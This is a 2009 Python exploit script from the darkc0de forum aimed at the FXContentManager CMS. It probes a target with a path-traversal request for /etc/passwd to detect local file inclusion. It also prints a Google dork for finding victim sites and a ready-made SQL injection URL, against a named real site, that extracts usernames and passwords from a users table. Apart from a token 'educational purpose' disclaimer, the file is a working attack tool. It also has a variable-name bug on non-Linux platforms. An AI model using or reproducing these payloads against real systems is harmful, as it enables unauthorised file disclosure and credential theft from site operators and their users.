#!/usr/bin/python
# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage!
# !!! Special greetz for my friend sinner_01 !!!
# !!! Special thanx for d3hydr8 and rsauron who inspired me !!! 
#
################################################################ 
#       .___             __          _______       .___        # 
#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
#        \/                  \/             \/                 # 
#                   ___________   ______  _  __                # 
#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
#                 \  \___|  | \/\  ___/\     /                 # 
#                  \___  >__|    \___  >\/\_/                  # 
#      est.2007        \/            \/   forum.darkc0de.com   # 
################################################################ 
# ---  d3hydr8 - rsauron - P47r1ck - r45c4l - C1c4Tr1Z - bennu # 
# ---  QKrun1x  - skillfaker - Croathack - Optyx - Nuclear     #
# ---  Eliminator and to all members of darkc0de and ljuska.org#                                                             #
################################################################ 
################################################################ 
#
# LFI bug found by marcoj (www.x0rg.net) and r0ot (www.x0rg.net)
#
# Sql injection on www.reversedelta.co.uk and CMS name found by me :)
#



import sys, os, time, urllib2, re

if sys.platform == 'linux' or sys.platform == 'linux2':
	clearing = 'clear'
else:
	clearint = 'cls'
os.system(clearing)

if len(sys.argv) !=2:
	print "\n|---------------------------------------------------------------|"
        print "| b4ltazar[@]gmail[dot]com                                      |"
        print "|   01/2009      LFI  FXContentManager                          |"
	print "| Example: fxcms.py http://www.site.com/                        |"
	print "| Visit www.darkc0de.com and www.ljuska.org                     |"
        print "|---------------------------------------------------------------|\n"
	sys.exit(1)
	
site = sys.argv[1]
if site[:4] != "http":
	site = "http://"+site
if site[-1] != "/":
	site = site + "/"
	
print "\n|---------------------------------------------------------------|"
print "| b4ltazar[@]gmail[dot]com                                      |"
print "|   01/2009      LFI   FXContentManager                         |"
print "| Visit www.darkc0de.com and www.ljuska.org                     |"
print "|---------------------------------------------------------------|\n"
print "\n[-] %s" % time.strftime("%X")
print "\n[+] CMS --> FXContentManager"
print "\n[+] Google dork : inurl:/fxmodules/"
print "\n[+] Home: http://www.reversedelta.co.uk"
print "\n[+] Portfolio: http://www.reversedelta.co.uk/page.php?id=28&parent_id=3"
print "\n[+] Also vulnerable on sql injection :)"
print """\t[!] http://www.reversedelta.co.uk/page.php?id=4&parent_id=2+and+1=2+union+all+select+0,1,concat_ws(char(58),username,password),3,4,5,6,7,8,9,10,11,12,13+from+users--"""
print "\n[+] Lets search for lfi bug :)"
print "\n[+] Target:",site
print "\n[+] Check if vulnerable ..."
print

try:
	target = urllib2.urlopen(site+"fxmodules/page.php?page=../../../../etc/passwd").read()
	if re.findall("root:x:", target):
		print "[!] Site is vulnerable "
		print
		print "*"*95
		print "\t"+site+"fxmodules/page.php?page=../../../../etc/passwd"
		print "*"*95
		print
	else:
		print "\t[-] Sorry, this site is not vulnerable"
		print
except(urllib2.HTTPError):
		pass
except(KeyboardInterrupt, SystemExit):
		raise
	

print "\n[-] %s" % time.strftime("%X")